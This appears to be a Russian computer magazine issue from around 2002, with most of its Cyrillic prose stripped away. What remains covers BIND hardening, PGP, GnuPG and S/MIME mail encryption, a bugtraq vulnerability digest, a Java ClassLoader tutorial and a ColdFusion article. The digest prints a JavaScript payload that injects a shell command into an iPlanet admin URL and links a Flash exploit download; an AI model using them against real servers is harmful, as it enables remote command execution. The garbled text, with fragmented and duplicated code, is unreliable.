1D
1D
1D
1D
1D
1D
1D
1D
1D
1D
1D

IN
IN
IN
IN
IN
IN
IN
1D
IN
1D
1D
IN
IN
IN
IN
IN
IN
IN

SOA

ns root (
2001081109
8H
2H
1W
1D )

;serial
;refresh
;retry
;expiry
;minimum

NS
ns
NS
r1.ns.net.
NS
r2.ns.com.
MX
20 m1.ns.net
MX
10 m2.ns.com
MX
10 main
A
192.5.62.78
IN
A
192.5.62.74
A
127.0.0.1
IN
CNAME main
IN
CNAME main
CNAME main
A
192.5.62.75
A
192.5.62.76
A
192.5.62.77
A
192.5.62.73
CNAME main
SOA
ns root (
2001081109
;serial
8H
;refresh
2H
;retry
1W
;expiry
1D )
;minimum

( ),
, , , ( ) DNS ,
. , , ,
.
, ,
(
) DNS-c.

, ;
DNS .
, . ,
bind 8.x.x.
bind, ,
named.conf (/etc/namedb/named.conf).


, named.conf
acl, ( ip- DNS-,
-
). acl
(named.conf):

named.conf bind:
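# CHAOS-class "bind" zone: this is where version.bind / authors.bind style
# queries are answered. Restricting it keeps the server's version string
# away from anyone outside the "trusted" ACL; transfers are refused.
# Every element of an address match list needs its own ";" — the original
# "{ trusted }" would be rejected when named parses the file.
zone "bind" chaos {
    type master;
    file "primary/bind";
    allow-query { trusted; };
    allow-transfer { none; };
};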

, , :
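# Hosts that may query this server, receive zone transfers and use
# recursion (referenced from "options" and the zone statements).
# NOTE(review): a bare "192.168.3.0" in an address match list matches
# that single address only; the text appears to mean the whole local
# network, which needs the prefix length.
acl "trusted" {
    localhost;
    192.168.3.0/24;
};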

, localhost
(192.168.3.0),
c .
options :
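options {
    ...
    # Nobody outside the "trusted" ACL may query this server at all.
    allow-query { trusted; };
    # Zone transfers are refused server-wide; a zone statement can
    # re-enable them for its own secondaries.
    allow-transfer { none; };
    # Recursion (and with it most cache-poisoning exposure) is offered
    # to trusted hosts only.
    allow-recursion { trusted; };
    ...
};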

bind
( , , ),

zone.
: ,
(slave), ip- , (master), (0.0.127.in-addr.arpa), , :
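# Per-zone settings override the server-wide ones from "options":
# the data itself is public, transfers stay limited to our secondaries.
zone "example.com" {
    type master;
    file "primary/example.com";
    allow-query { any; };
    # A bare 192.168.3.0 would match one host, not the network; the
    # prefix length is what the surrounding text appears to intend.
    allow-transfer { localhost; 192.168.3.0/24; };
};
# Reverse zone pulled from the master at 192.168.3.1. The file name is
# the author's; any path works, but one that matches the zone name is
# easier to audit.
zone "3.168.192.in-addr.arpa" {
    type slave;
    file "secondary/0.126.in-addr.arpa";
    masters { 192.168.3.1; };
    allow-query { any; };
    allow-transfer { localhost; };
};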

, ,
()
(intranet), . . ,
bind , .


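$TTL 3600
$ORIGIN bind.
; Zone file for the CHAOS-class "bind" zone declared in named.conf.
; It exists only so that queries for the server's version can be
; answered (or refused) under the zone's own access rules.
@   1D  CHAOS   SOA localhost. root.localhost. (
                    1       ;serial
                    3H      ;refresh
                    1H      ;retry
                    1W      ;expire
                    1D )    ;minimum
        CHAOS   NS  localhost.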

; , , , . binda : -.
( logging):
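logging {
    # General channel: everything named reports at "info" and above goes
    # to its own file, each line stamped with time and category.
    # ("severity" was misspelled "serverity" in the original; named would
    # refuse to start on the unknown keyword.)
    channel default_ch {
        file "/var/log/named.log";
        severity info;
        print-time yes;
        print-category yes;
    };
    # Security-related events (approved and refused requests) are kept
    # in a separate file so they can be watched and rotated on their own.
    channel security_ch {
        file "/var/log/security.log";
        severity info;
        print-time yes;
        print-category yes;
    };
    category default { default_ch; };
    category security { security_ch; };
};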

. ,
,
DNS DNS chrooted environment, sandboxa . ., .

:
1. . . Securing Bind.
2. RFC DNS.
3. man bind.
4. Craig H. Rowland. Securing Bind.





C.
.
( ) ,

.

, .
,
. , . ,
. (
) ,
(

, ).
,

. :
( , ,
, ,
),
,
. ,
,
-
, - , . ,

, , . , , .
:
,


(4096 ),

.
32- , .

, , . (
), , .
,
. The Bat, PGP GnuPG,
S/MIME.
The Bat. . -, The Bat , , MD5
NTLM
( Windows NT ), , , POP SMTP ,

.
PGP S/
MIME. PGP (pretty
good privacy) (
, S/MIME).

. , (
, -,

( )).
, ,
. , 500 ~800 ,
24101 11270 (

)!
PGP :
/ (
). PGP ,

( , ).
Bat PGP,
rfc-1991,
, . PGP
IDEA(128 )
MD5 .
, The Bat PGP,
GnuPG(!),
, ; PGP -> OpenPGP
-> PGP.
PGP (
PGP):
! :
-> OpenPGP-> ,
<Ctrl+N> (
1024 , ,
, 2048 ).
!
, ( ,
).
,

.
: ->
->
-PGP.
.
! .


, ,

!
: , ,
OpenPGP OpenPGP ( , PGP,
).
,
, ,
,
. , , -
,
.

<CTRL+SHIFT
+C>, <CTRL
+SHIFT+D>, ,

,

. ,
,
!
PGP
:
:
BEGIN PGP PUBLIC KEY BLOCK
Version: 2.6
mQEPAz2wAdcAAAEIAMbtzluSULSrU3X1
qvf9QBeY+VCI7Pe/Wi0eSun8g7do9V0q ....
END PGP PUBLIC KEY BLOCK

:
BEGIN PGP SIGNED MESSAGE
Hash: MD5 _
BEGIN PGP
SIGNATURE
Version: 2.6
iQEVAwUAPcbEbnuMbS82Jh/FAQFWvwf/
aJEiMj/mUPlHzNLIelDMwJZMxK+9UuBL
END PGP SIGNATURE

:
BEGIN PGP MESSAGE
Version: 2.6
lIwRIouHmq+nJjsBBEA7FCH1rS6C/
hfi4J1MHN+q/EycFltExRTqjIcOtoiDYNvJ
END PGP MESSAGE

PGP ,
PGP . PGP
Version: Hash: (
,
SHA1 (160 ) MD5 (128 )).
PGP ,
.

, PGP
. , The
Bat PGP *nix GnuPG.
-
.
GnuPG PGP, ,
,
. GnuPG (www.gnupg.org)
, .
, www.gnupg.org
, -

.
gnupg.
! gpg help
gnupg (
);
! gpg gen-key
;
! gpg -s -o out_file in_file (-s) in_file
out_file;
! gpg verify signed_file signed_file;
! gpg export
(
stdout) ;
! gpg export armor
: BEGIN
PGP PUBLIC KEY BLOCK
Version:
GnuPG
v1.2.1
(Linux), stdout;
! gpg import filenames ;
! gpg -e -r recipient@mail.ru filename
filename,
recipient@mail.ru (
). -e -s,
;
! gpg fingerprint <username> md5 username
( , username ).
, GnuPG

www.thawte.com
(personal freemail certificate). ,
. e-mail (mail ping)
, . (
), . ,
(IE, Netscape, Opera),
IE, .. Windows.
thawte freemail, ( Trusted root CA).
( !). ,
, thawte freemail .
, Outlook[ Express] .
, ->->-> .
( ) . The Bat Mozilla,
, , . , The Bat . The Bat
, .. . :
Outlook , : Thawte Personal Freemail CA
Personal Freemail RSA 2000.x.x. , Trusted Root CA
- Thawte personal freemail.
Outlook. , Thawte Freemail .
, ( : Thawte Freemail
CA -> Personal freemail RSA 2000.x.x -> Thawte Freemail Member).




(self-signed public
key) ,
self-signed. , gnupg armor ( ), /
( -
),
.
armor, gnupg
PGP ().
(-r) gnupg,
.
: e-mail, ,
(
), .
, PGP .
S/MIME.
,

( The Bat, Mozilla
Messenger, Outlook). S/MIME (..
) .
( , ,
) ,

(, , self-signed).

S/MIME
, .
,
S/MIME, ,
S/MIME
. S/MIME
:
Content-Type: multipart/signed;
protocol=application/pkcs7-signature;
micalg=sha1;
boundary=
C61031FF2231ECF0"
This is a cryptographically signed
message in MIME format.
C61031FF2231ECF0
Content-Type: text/plain;
charset=koi8-r
Content-Transfer-Encoding: 8bit



C61031FF2231ECF0 Content-Type:
application/pkcs7-signature;
name=smime.p7s
Content-Transfer-Encoding:
base64 Content-Disposition:
attachment; filename=smime.p7s
Content-Description:
S/MIME Cryptographic Signature
MIIFPQYJKoZIhvcNAQcCoIIFLjCCBSoCAQMx
CzAJBgUrDgMCGgUAMAsG
CSqGSIb3DQEHAaCCAyow ...
C61031FF2231ECF0

, .
.
, S/MIME ,
, , The Bat, , root ca (
). The Bat , S/MIME,
.
(, , The Bat
S/MIME ).

The Bat ( ,
-). ->S/MIME,
S/MIME, ( ).

,
C .
C . , . , ,

trusted ca.


.

,
-

trusted root
ca.
( ,
, ). , S/MIME
.
The Bat
-> OpenPGP
-> S/MIME.
OpenPGP.
S/MIME,
2 ( 2048
IDEA 128 ).
, -,
The Bat OpenPGP
( gnupg, gpg.exe PATH).

, , ,
OpenPGP,
, ( , ).
...
Win* The Bat gnupg,
*nix gnupg.

(
).
,
:
! www.nobat.ru
The Bat;
! www.gnupg.org
gnupg;
! www.ritlabs.com
The Bat ( -
);
! certs.netscape.com ,
.
, !


( )
-.
, .
. , .
.

. .
,
, , 6
, , , . , . , ,
.


, , .
, ?
. , , , ,
, .
. ,

.
-
. ,
, .

, .
, ,
. , , . ,

,
.
,
. , , ,
. ,


,
: , .
.
,
!
. ,
,
?
, . ,
, .
?
. . ,

, .
. , .

: , , . ,
. .
,
. ,
.
. : , , ,
, . ,
, .
,
. -
, - . ? , -
, , ,
. ?
, ,
: , , - . ,
, ,
, 99% ,
300 500 .
-
.


, -
.
? .
, ? ?
, . . ,
,
.
.
. 1991

. . ,
,
. .

? , !

,
.
, , ,
,
. .

. , , .
, - .
,
, , . ,
, . ,
. , , .
,
1999- , . -

. . . . , ,
. . 98-
, .
, -
. , ,
, - .
. .
, . , ,
.
, ,
,
. , . , .
.
. ,
.
, ,
. !
.
, . - -1.
, , . , . ,
85 , .
, , ,
,
.
.
.
.

?
. .
-, : -



.
, .
, 10 . .
.
. ,
, . , ...
.
.

, .
, e-commerce. , . ,
,
, .
, , , ,
. ,
,
,
. , ,
.

,
. , . - -
.
?
, ? .

. 17
. 2- .
,


. .
.
,
?
?
.
1986- , -86, . , . , 82 , .
, 8088, XT-.
,
. , ,
,
. ,
, , : , ! . , ,
, .
, ?
, .
, .
,
, . ,
. ,
. , ,
, . , .
. ,
.
,
- , .

, ,
, !
. . ,
, , ,
. . -

,
-
.
, , .

, ,
.
.
, , ,
.
. ,
- . , ,
.
.
, , , , . ,
. .
,
,
, ,
1998-
, . . ,
.
, . , ,
, , .
,
.
,
, .
,
,
,
. , . ,
.
. .


,

.
.

, . . , ,
, . , , . .
, .
, .

. ,
, ?
. ,
. .
. . ,
, .
. , . .
.
,
.
. , .
? , ? . ? . ,
,
- , . , .
, .


. , , ,
.
30%
. . ,
,
. , , .
, .
,
.
! ,
.
, .
,
: ? ?

. 745- . ,
. .
, ,
. ,
. , . , ,
, .
, ,
.

, .
,
.
.
,
,
.
. . ,
? , ?
,
262.
, . 1999-.


1997-, .. . 3-4 -. 90%.
, .
.
.
. -,

, . -, , - . - ? -, .
,
. ,
- .

. ,
.
, ,

.

, , ,
60
. . , , . , . : ,
,
. :
!.
,

, , ?
, . , (
).
. .
.
.


bugtraq
MDAC (Internet
Explorer, Internet Information Server)
Microsoft Data Access Components (MDAC) , Windows-. MDAC , Windows-:
! Windows XP,
Windows 2000 Windows Millennium.
! .
! (, Windows NT 4.0, Option Pack
Internet Explorer).
MDAC ,
. MDAC-, Remote Data Services(RDS),
,
, ,
, . RDS-, RDS Data Stub, HTTP- RDS-.
Data
Stub. HTTP-
Data Stub,
.
, , Microsoft
,
.
-, :
! - , MDAC
. -
HTTP-, . IIS ( , LocalSystem).
! - , RDS Data
Stub Internet Explorer
, . - HTML .
Microsoft,
, , . - MDAC / RDS,
MDAC 2.7, . -
,
RDS. ,
- MDAC, -
.
Microsoft Data Access
Components (MDAC) 2.1 Microsoft Data Access Components


(MDAC) 2.5, Microsoft Data Access Components (MDAC) 2.6,


Microsoft Internet Explorer 5.01, Microsoft Internet Explorer
5.5, Microsoft Internet Explorer 6.0.


iPlanet Web Server

root-, iPlanet Web Server 4.* up to SP11 (NG-XSS).
:
! open() Admin Server PERL .
! .
iPlanet Web Server,
Perl- .
- .

, Perl.
, Perl . ,

. javascript :
<script>
window.location="/https-admserv/bin/perl/
importInfo?dir=|<command>%00";
</script>


Macromedia Flash
SWRemote , Macromedia Flash.
shellcode,
.
Macromedia Flash 6.0.47.
: http://
www.securitylab.ru/_tools/swfexpl.zip.

Samba

Samba. -
,
.
,
pam_smbpass PAM. , root .
Samba 2.2.2-2.2.6.


SITEMETA

, <META>
, , ,
.
,
.

.
.
.
.
.

. 0.001 1000 . .
. (HTML, XML, DOC, XLS, . .)




,
, , , -
, , ,
, , siteMETA, .

?
-
, . , ,
, .
:
. . , -
, ,
... , ,
. , ?
Web-usability
: . -, -
, -, . : ,
. .
.
-,
, . , ,
.
, ? , , , .
, ,
,
( ) .

?
, ,
.
. ,
,
. . -


,
,
. ,

, .
,
, .

, ,
. , , ,
,
.
, , , . , , , , , , ,

. , . ,
!

.
, () ,
, .
,
, .

,
.

, , .

COM UNIX? !
COM. , Component Object Model
( UNIX, ,
)
Microsoft Windows, Linux
FreeBSD, ,



.
,
.
BerkeleyDB, .
libgist, . , , ,
,
libgist , ,
b-tree, . ,
,
, ,
.

, ...
. ,
, :
! ;
! ;
! ,
, ;
! , .
,
, , .

... ?
, b-tree,
, , , .
( ), - .
, .



. ,

, , .
,
,
, . ,
!
,
, .

...
,
: , .
-. siteMETA ,
. , .
, . . .
- - . .
; , , .
. , , ,
.



.
. ,
, -, , , ,
wildcard- . . CGI-, , - , -


, , . .
, -, .
, ,
.

(www.bank.gov.ua). ,
html Microsoft Excel (.xls)
( ) .
50 .

web- ...
. , , , , -
,
HTML.
?

siteMETA, html-, , Microsoft Word, Microsoft Excel
.
.doc, .xls, .rtf .xml. , , , -.

, ,
. , siteMETA, log-. , ,
,
, . ., . ,
,
. ,

,
. , , : -
,

.
, ,
. , , ,
.
!

!
.
. .

, -



(http://www.zerkalonedeli.com/). ,
, . ,
, , ; . 800 .

siteMETA, . , .
, ,
, , -.
siteMETA
http://sitemeta.com.


JAVA:

II. ClassLoader




java.lang.ClassLoader.
.
Java . , , Java,
. , Java,
Java-, Java. , .
, ClassLoader Java. ,
,
ClassLoader . ,
- .class-, ,

ClassLoader.

ClassLoader . Java :
java __

JAR-, CLASSPATH (
-cp java),
JAR-,
java.lang.String Java.
Java , ClassLoader
.
Java-. Java-,
, , Web- , .
ClassLoader,
Java-. , , , CLASSPATH, Internet.
, .
-
, ,
.class-. .
,
, -. -


: c , Internet,
- , ClassLoader - ( .class-) byte[].

ClassLoader.defineClass, Class.

.class-
Java-. ,
, , Java. Java- Java,
,
ClassLoader.

Java
ClassLoader .
, ,
Java .
,
ClassLoader
. ClassLoader.getSystemClassLoader() ClassLoader, :
public static ClassLoader getSystemClassLoader()

Java :
java __

Java , .class- , :
public static void main(String[] argv)

( , ).
Java . , java1.
-
( : ,
),
. ,
. ,
. ( .)
. ?
Java -



. ( ClassLoader), , .
. , , , getClassLoader:

initialize true, ,
, .
Class.forName, (,
1, 2002.)

public ClassLoader getClassLoader()


public static Class forName(String className)

Class, .
,
MyClass, MyClass.class.getClassLoader()
, , ..
-, MyClass.class.getClassLoader().

, , Java- ,
.

. , , ,
, .
,
, . Java-
(
Web-);
.

. , . , , - . ,
, . , ,
,
, java.lang.String.
,
Class.forName:
public static Class forName(String name,
boolean initialize,
ClassLoader loader)

name ( ), loader .
( ) initialize , ..
static- :
static {
...
}


.
,
Class.forName(name)


Class.forName(name,true, _.class.getClassLoader())

_ , .
,
.
( .)
Java
loader ( - , loader - ). :
Class clazz= Class.forName("_",true,
__);
clazz.newInstance(); //

_ (Thread),
. , ,
.

ClassLoader
ClassLoader , .
, .
Sun.
ClassLoader .
, .
???????????????????????????????????????????


public Class loadClass(String name)

.
protected-:


protected synchronized Class loadClass(String name,
boolean resolve)

, protected .
, loadClass(String name) public.
,
Class.forName("_",true,loader)

( Class ClassLoader
loadClass(String name)
protected.
Class.forName .)
, loadClass public-,
Class.forName(_,true,loader) loader.loadClass(_) ?
,
Class.forName.
. ,
Class.forName , , , , loadClass,

loader.
, :
public URL getResource(String name)
public InputStream getResourceAsStream(String name)
public final Enumeration getResources(String name)
public static URL getSystemResource(String name)
public static InputStream getSystemResourceAsStream(
String name)
public static Enumeration getSystemResources(String name)

getResource
getResourceAsStream Class,
.
Class.getResource Class.getResourceAsStream
, .
ClassLoader . , class- (
Class.getResource Class.getResourceAsStream),
,
CLASSPATH.

getSystemResource, getSystemResourceAsStream,
getSystemResources , - .
System ,
.
, .
ClassLoader .

:


ClassLoader.
Java
ClassLoader .class - , , , CLASSPATH.
, , ,
. .class , CLASSPATH,
.
Internet ,
,
.
.
,
Java. - :
. , , ,
.
, ,
.
. ,
. ,
, ( , ).
,
.
.

.
Class.forName(name) (, CLASSPATH
.class-), ,
.
.class- . ,

.
.class-

. , , (.. Java), - , .
-
, : -



. ( ClassLoader), , .
. , , , getClassLoader:

initialize true, ,
, .
Class.forName, (,
1, 2002.)

public ClassLoader getClassLoader()


public static Class forName(String className)

Class, .
,
MyClass, MyClass.class.getClassLoader()
, , ..
-, MyClass.class.getClassLoader().

, , Java- ,
.

. , , ,
, .
,
, . Java-
(
Web-);
.

. , . , , - . ,
, . , ,
,
, java.lang.String.
,
Class.forName:
public static Class forName(String name,
boolean initialize,
ClassLoader loader)

.
,
Class.forName(name)


Class.forName(name,true, _.class.getClassLoader())

_ , .
,
.
( .)
Java
loader ( - , loader - ). :
Class clazz= Class.forName("_",true,
__);
clazz.newInstance(); //

_ (Thread),
. , ,
.

ClassLoader
ClassLoader , .
, .
Sun.
ClassLoader .
, .
public static ClassLoader getSystemClassLoader()

name ( ), loader .
( ) initialize , ..
static- :
static {
...
}



public Class loadClass(String name)

.
protected-:


defineClass:

return findSystemClass(name);
// .
// findSystemClass -
// ClassLoader
// protected final Class findSystemClass(String name)
// (..
// ).
//
// .
// "findSystemClass(name)"
//
//
// java.lang.String,
// JAR-
// ( JAR)
}
try {
byte[] classBytes= loadFileAsBytes(f);
result= defineClass(name,
classBytes,0,classBytes.length);
} catch (IOException e) {
throw new ClassNotFoundException(
"Cannot load class "+name+": "+e);
} catch (ClassFormatError e) {
throw new ClassNotFoundException(
"Format of class file incorrect for class "
+name+": "+e);
}
classesHash.put(name,result);
return result;

protected final Class defineClass(String name,


byte[] b, int off, int len)
throws ClassFormatError

, .class- ( b len off) . defineClass, , native-. - ,


, ,
,
( Just-In-Time, JIT-).
, findResource
, ,
findClass URL.

,
loadClass Class . , , :
?
private- java.util.HashMap DynamicClassOverloader. ,
,
.
, : .

}
protected java.net.URL findResource(String name) {
    // Locate a non-class resource on this loader's own search path and
    // hand it back as a file: URL; anything that cannot be found, or whose
    // path cannot be expressed as a URL, is reported as "no such resource".
    File located = findFile(name, "");
    if (located != null) {
        try {
            return located.toURL();
        } catch (java.net.MalformedURLException e) {
            // Fall through: an unconvertible path is treated as not found.
        }
    }
    return null;
}
private File findFile(String name, String extension) {
    // Walk the loader's classPath entries in order and return the first
    // existing file named name + extension below one of them. 'name' uses
    // '/' as its separator (the form produced by findClass and accepted by
    // findResource) and is mapped to the platform separator here.
    // NOTE(review): nothing prevents a name containing ".." from resolving
    // outside the classPath entry; callers are expected to pass class names
    // or resource names they trust.
    String relative = name.replace('/', File.separatorChar) + extension;
    int entries = classPath.length;
    for (int idx = 0; idx < entries; idx++) {
        String base = (new File(classPath[idx])).getPath();
        File candidate = new File(base + File.separatorChar + relative);
        if (candidate.exists()) {
            return candidate;
        }
    }
    return null;
}

import java.io.*;
public class DynamicClassOverloader extends ClassLoader {
private java.util.Map classesHash= new java.util.HashMap();
public final String[] classPath;
public DynamicClassOverloader(String[] classPath) {
    // The caller supplies the directories to search; they play the role
    // CLASSPATH plays for the system loader, but only for this instance.
    super();
    this.classPath = classPath;
}
protected synchronized Class loadClass(String name,
                                       boolean resolve)
    throws ClassNotFoundException
{
    // Every request goes straight to findClass, which consults this
    // loader's own cache and falls back to the system loader; there is
    // deliberately no findLoadedClass()/parent delegation here, so a
    // replaced .class file is seen by a new loader instance.
    Class loaded = findClass(name);
    if (!resolve) {
        return loaded;
    }
    resolveClass(loaded);
    return loaded;
}
protected Class findClass(String name)
throws ClassNotFoundException
{
Class result= (Class)classesHash.get(name);
if (result!=null) {
/*
System.out.println("% Class "+name
+" found in cache");
/*
return result;
}
File f= findFile(name.replace('.','/'),".class");
// mypackage.MyClass
// mypackage/MyClass.class
/*
System.out.println("% Class "+name
+(f==null?"":" found in "+f));
/*
if (f==null) {


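public static byte[] loadFileAsBytes(File file)
    throws IOException
{
    // Read the whole file into memory.
    // InputStream.read() may return fewer bytes than requested, so the
    // original single read could hand back a partially filled, zero-padded
    // array for larger files; loop until the buffer is full or the stream
    // ends. Returns exactly the bytes that were read.
    long length = file.length();
    if (length > Integer.MAX_VALUE) {
        throw new IOException("File too large to load into memory: " + file);
    }
    byte[] result = new byte[(int) length];
    FileInputStream in = new FileInputStream(file);
    try {
        int filled = 0;
        while (filled < result.length) {
            int n = in.read(result, filled, result.length - filled);
            if (n < 0) {
                // The file shrank between length() and read(); return what
                // actually exists rather than trailing zeros.
                byte[] shorter = new byte[filled];
                System.arraycopy(result, 0, shorter, 0, filled);
                return shorter;
            }
            filled += n;
        }
    } finally {
        try {
            in.close();
        } catch (Exception e) {
            // A failure to close is ignored: any real error has already
            // been raised by read(), and nothing more can be recovered.
        }
    }
    return result;
}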

. TestModule.java,
:
public class TestModule {


public String toString() {


return "TestModule, version 1!";
}

Test.java, :
import java.io.*;
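public class Test {
    // Demonstrates re-loading: each pass creates a fresh loader, so a
    // TestModule.class replaced on disk is picked up without restarting.
    public static void main(String[] argv) throws Exception {
        // One reader for the whole run; a new BufferedReader per iteration
        // could swallow input already buffered by its predecessor.
        BufferedReader console = new BufferedReader(
            new InputStreamReader(System.in));
        for (;;) {
            // "." is the search path for the module's .class file.
            ClassLoader loader = new DynamicClassOverloader(
                new String[] {"."});
            Class clazz = Class.forName("TestModule", true, loader);
            Object object = clazz.newInstance();
            System.out.println(object);
            // readLine() returns null once stdin is closed; without this
            // check the original looped without pausing from then on.
            if (console.readLine() == null) {
                break;
            }
        }
    }
}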

,
Test:
java Test

loader, TestModule, , , , toString(), TestModule.


ENTER (
Ctrl-C ).
ENTER, ( Windows) ( Unix), -
TestModule: toString()
TestModule, version 2! . ENTER.
! TestModule.class TestModule, version 2!.
, , class-, .
TestModule
,
. ,
,
.


,
? , , ,
- , ,
object.toString(). - java-
java _

. ,


Java-, .
-
, , ,
.
,
,
. ,
, ,
. .
,
,
Class.forName("_",true,loader)

,
, , ,

Java. , , , ,
.
, .
newInstance() Object.
, TestModule,

:
...
Class clazz= Class.forName("TestModule",true,loader);
TestModule testModule= (TestModule)clazz.newInstance();
testModule, ..

Class.forName(TestModule), .
. forName
TestModule ( ,
TestModule), . .

.
ClassCastException !

,
, .
. , , - . , , -


LinkageError.
. ,
Java.
- , Java, , .
.
. , Java
static , . () .
DynamicClassOverloader, class-, .
: , -,

DynamicClassOverloader (, ) .
Java
, .
, Java ,
, .
, , , , .
, Java, TestModule,
TestModule
testModule= ... Test.java,
TestModule,
Class.forName("TestModule",true,loader)

. (
Test),
DynamicClassOverloader. -
.
, , , TestModule, . . TestModule:
public class TestModule {
    // Shared by every instance defined by the same loader; a copy of the
    // class defined by a new loader starts again from zero.
    private static int counter = 0;
    public String toString() {
        int current = counter;
        counter = current + 1;
        return "TestModule, version 1! " + current;
    }
}


toString()
, 1
counter. Test.java
Class.forName(TestModule), :
.
.
DynamicClassOverloader
,
TestModule,
.
, Java
. ,
, ,

,
.
, , .
?
, ,
DynamicClassOverloader, , Test.

, .. ,
findSystemClass(name). - truestatic. true-static-
. truestatic-
, Java,
. , ,
true-static ,
, , , , . .
, true-static- java.lang,
. ,
Object String. TestModule
String toString().
, true-static-. ,

static- , 2.
( ) :
, name truestatic .
,
DynamicClassOverloader: findClass



File f= findFile(name.replace('.','/'),".class");

name. findClass:
protected Class findClass(String name)
throws ClassNotFoundException
{
Class result= (Class)classesHash.get(name);
if (result!=null) {
/*
System.out.println("% Class "
+name+" found in cache");
/*
return result;
}
if (name.toLowerCase().indexOf("truestatic")!=-1)
return findSystemClass(name);
File f= findFile(name.replace('.','/'),".class");
...

. truestatic- TrueStaticModule.java:
public class TrueStaticModule {
    // protected so that a subclass defined by another loader can still
    // update it; public readers go through getCounter().
    protected static int counter = 0;
    public int getCounter() {
        int snapshot = counter;
        return snapshot;
    }
}

public- getCounter(), .

DynamicModule.java:
public class DynamicModule extends TrueStaticModule {
    // Bumps the counter inherited from TrueStaticModule on every call.
    public String toString() {
        int current = counter;
        counter = current + 1;
        return "DynamicModule, version 1! " + current;
    }
}

, Test.java :
import java.io.*;
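public class Test {
    // Same demonstration as before, but the module is addressed through
    // its TrueStaticModule base class, which is defined by the system
    // loader and therefore shared across all re-loaded copies.
    public static void main(String[] argv) throws Exception {
        // One reader for the whole run; a new BufferedReader per iteration
        // could swallow input already buffered by its predecessor.
        BufferedReader console = new BufferedReader(
            new InputStreamReader(System.in));
        for (;;) {
            // "." is the search path for the module's .class file.
            ClassLoader loader = new DynamicClassOverloader(
                new String[] {"."});
            Class clazz = Class.forName("DynamicModule", true, loader);
            TrueStaticModule trueStaticModule =
                (TrueStaticModule) clazz.newInstance();
            System.out.println(trueStaticModule.getCounter());
            System.out.println(trueStaticModule);
            // readLine() returns null once stdin is closed; without this
            // check the original looped without pausing from then on.
            if (console.readLine() == null) {
                break;
            }
        }
    }
}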

:
java Test

.
DynamicModule,


.
toString() true-static-
TrueStaticModule.
ClassCastException, counter .
.
, true-static- forName,
forName.
, forName , , private-,
forName.
. ,
invalidate, private-
forName
.
invalidate Java- ,
. ,
.

Java . : . ,
true-static. .
, ,
, Java.
Java- ,
DynamicClassOverloader, ,
, DynamicClassOverloader.
,
, DynamicClassOverloader. , ,
true-static-.
A. , true-static-
, : ,
, . , -


Java.

Class.forName("TestModule",true,loader)

true-static- ( ), , . , (
) true-static-, ,
true-static-,
true-static- . .
- . ,
,
. , , , -
true-static- , ,
- static- truestatic-.
, , .

TestModule.
, ,

true-static-
TrueStaticModule .
, . , .. . , ,
, ,
, ,
.
, , , true-static.
. - , , , ,
.
A .
A1.
( , true-static-)
- , . , ,

, -


, , DynamicClassOverloader.
A2. true-static-,
, , true-static-, ,
, true-static-.
public-, . ( true-static- ,
java.lang.String java.io.File,
.)
A3. - , , ,
catch (_ e)

,
_ true-static.
:
B. ,
. : , ,
, .
:
B1. ,
. .
,
Java-. public-, ,
public static boolean debugMode= false;

.
.
Java-

.
. static- , . , DynamicClassOverloader, , static-.
, ,
true-static. :
public class __ {


public static class TrueStaticSection {


public static boolean debugMode= false;

}
...

B2.
, ,
true-static-,
true-static- public,
true-static-
java-. :
true-static, ,
, protected- true-static.
, true-static-, , , private .
,
Java-, , , ,
.
private- .
: ()
Java
.
, .
C. native - ,
System.loadLibrary
, true-static.
Java, , Windows. Java loadLibrary
.
.
System.loadLibrary :
static {
System.loadLibrary("__");
}


:
.


? ,
.
, -


: .
, ,
:
. ,
, , , ,
C, . , C, ,
.
, , Java.

:
loadClass forName
DynamicClassOverloader.

System.out.println, .
, .
Java, , ,
Class result= (Class)classesHash.get(name);
if (result!=null) {
...

!

: , Class.forName
, ,
. . , loadClass, loadClass findClass . , Java- .
Class.forName. , ,
- .

DynamicClassOverloader, .
, Java-. ClassLoader
protected-
findLoadedClass , -


. null.

, . , ,

Class.forName("_",true,loader)


loader.loadClass("_")

loadClass
. (
Class.forName , ,
loader name , forName loadClass findClass.)
, , ..
defineClass.

loader.loadClass("_")
loader.loadClass("_")

LinkageError! , .. defineClass.
Class.forName("_",true,loader)

,
.
, , , , ,
loader.loadClass("_")


Class.forName("_",true,loader)

Class.forName("_",false,loader)

DynamicClassOverloader .

,
DynamicClassOverloader invalidate:
public void invalidate() {
    // Forget every class this loader has defined so far; the next
    // loadClass/forName through it re-reads the .class file and
    // defines the class again.
    this.classesHash.clear();
}

classesHash?


: ?
.
Class.forName("_",true,loader)

invalidate, classesHash,
.
, loader .

loader.loadClass("_")

invalidate,
,
LinkageError.

DynamicClassOverloader
, DynamicClassOverloader

.
: . -verbose:class java
, .
. DynamicClassOverloader :
,
,
. .
DynamicClassOverloader , CLASSPATH. , .
, , , Java-: Web-
Microsoft Word. , . , ,
,
CLASSPATH .
, ,
, . Java-
, Internet,
Web- . Java ,



. ( . , .. package.) , , , .

DynamicClassOverloader, .
.

, Java
Java-. , .
.
, -

, Java , , .
Java , Java-
Java.
, Java-
.class-. , , ,
Java Java-.
1

. ,
,
,
. -

IT Alliance
IT-
21 2002 IT : InPrice, Zero Studio Positive
Technologies , - .
IT Alliance. .
, , -, .

.
- , , .
, , , .
- .
, IT
Alliance. , , , , :
InPrice , Zero Studio web, , Positive Technologies
web- .
,
, , IT Alliance
.
, .
-,
2003 .



, java -verbose:class.
2
,
. ,
Class
result= defineClass(name,classBytes,0,classBytes.length)

, , , TrueStatic.
TrueStatic.class.isAssignableFrom(result)

TrueStatic result,
, .
,
result, result.getInterfaces()
.

IT Alliance:
Zero Studio - . 1998
100 , , , . . Zero Studio , -
, Data Cable&Wireless,
.
InPrice
InPrice , , 1996. InPrice
ZIV, Minds@Work , - IOI Technology Corporation
Taiwan, Compaq, PC, OEM Fujitsu,
USBnet, Inc. InPrice ,
, .
IDS (InPrice Data Systems) - , InPrice. , ,
. IDS
InPrice . 2002 . IDS
.

Positive Technologies ,
(.. ). Positive Technologies XSpider,
.

.
Positive
Technologies

IT,
.




COLDFUSION,


.
- , ,
- ,
,

. , web- .
, web-
,
? ,
. ,


:
? .
: !
.
,
(ColdFusion, ,

, 1, 2002.) ColdFusion
.
ColdFusion.
(
setMyName.cfm) : myName, -


sayHi.cfm:
<!--- setMyName.cfm: myName is a request-local variable. <cflocation>
      makes the browser start a brand-new request for sayHi.cfm, which
      therefore never sees it (see the error discussed in the text). --->
<cfset myName="Alexander Mejenkov">
<cflocation url="sayHi.cfm">

<cflocation> sayHi.cfm,
.
sayHi.cfm :
<!--- sayHi.cfm: expects myName from setMyName.cfm; reached through the
      redirect it fails with "Error resolving parameter MYNAME". --->
<cfoutput>
